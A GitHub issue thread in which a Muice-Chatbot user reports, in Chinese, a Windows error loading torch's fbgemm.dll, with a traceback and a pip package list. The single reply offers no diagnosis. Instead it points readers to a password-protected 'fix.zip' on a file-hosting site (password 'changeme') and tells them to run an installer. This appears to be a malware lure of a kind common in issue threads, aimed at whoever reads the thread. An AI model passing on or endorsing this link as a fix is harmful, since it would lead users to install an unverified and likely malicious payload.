### ISSUE TITLE
[Bug]OSError: [WinError 126] 找不到指定的模块。

### ISSUE THREAD

**Issue by fengyewater** [Moemu/Muice-Chatbot#50]
### 描述此Bug

OSError: [WinError 126] 找不到指定的模块。 Error loading "D:\soft\Anaconda\envs\Muice\lib\site-packages\torch\lib\fbgemm.dll" or one of its dependencies.

### 控制台输出

(Muice) PS D:\soft\Jetbrains\python\Bot\Muice-Chatbot> python main.py                 
Traceback (most recent call last):
  File "D:\soft\Jetbrains\python\Bot\Muice-Chatbot\main.py", line 20, in <module>
    model = importlib.import_module(f"llm.{model_loader}")
  File "D:\soft\Anaconda\envs\Muice\lib\importlib\__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 883, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "D:\soft\Jetbrains\python\Bot\Muice-Chatbot\llm\transformers.py", line 3, in <module>
    import torch
  File "D:\soft\Anaconda\envs\Muice\lib\site-packages\torch\__init__.py", line 148, in <module>
    raise err
OSError: [WinError 126] 找不到指定的模块。 Error loading "D:\soft\Anaconda\envs\Muice\lib\site-packages\torch\lib\fbgemm.dll" or one of its dependencies.

### 复现该Bug的操作

告诉我们你如何复现此问题

### 额外信息
(Muice) PS D:\soft\Jetbrains\python\Bot\Muice-Chatbot> pip list
Package                  Version
------------------ ---------
annotated-types      0.7.0
anyio                        4.4.0
APScheduler            3.10.4
certifi                       2024.7.4
charset-normalizer  3.3.2
click                         8.1.7
colorama                 0.4.6
dnspython               2.6.1
email_validator        2.2.0
exceptiongroup      1.2.2
fastapi                     0.111.1
fastapi-cli                0.0.5
filelock                    3.15.4
fsspec                     2024.6.1
h11                         0.14.0
httpcore                 1.0.5
httptools                0.6.1
httpx                      0.27.2
huggingface-hub   0.24.6
idna                       3.8
Jinja2                     3.1.4
markdown-it-py    3.0.0
MarkupSafe           2.1.5
mdurl                    0.1.2
mpmath                1.3.0
networkx               3.3
numpy                  2.1.0
packaging            24.1
pip                       24.2
pydantic              2.8.2
pydantic_core     2.20.1
Pygments           2.18.0
python-dotenv      1.0.1
python-multipart   0.0.9
pytz               2024.1
PyYAML             6.0.2
regex              2024.7.24
requests           2.32.3
rich               13.8.0
safetensors        0.4.4
sentencepiece      0.2.0
setuptools         72.2.0
shellingham        1.5.4
six                1.16.0
sniffio            1.3.1
starlette          0.37.2
sympy              1.13.2
tokenizers         0.13.3
torch              2.4.0
tqdm               4.66.5
transformers       4.32.0
typer              0.12.5
typing_extensions  4.12.2
tzdata             2024.1
tzlocal            5.2
urllib3            2.2.2
uvicorn            0.30.1
watchfiles         0.23.0
websockets         13.0
wheel              0.44.0

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
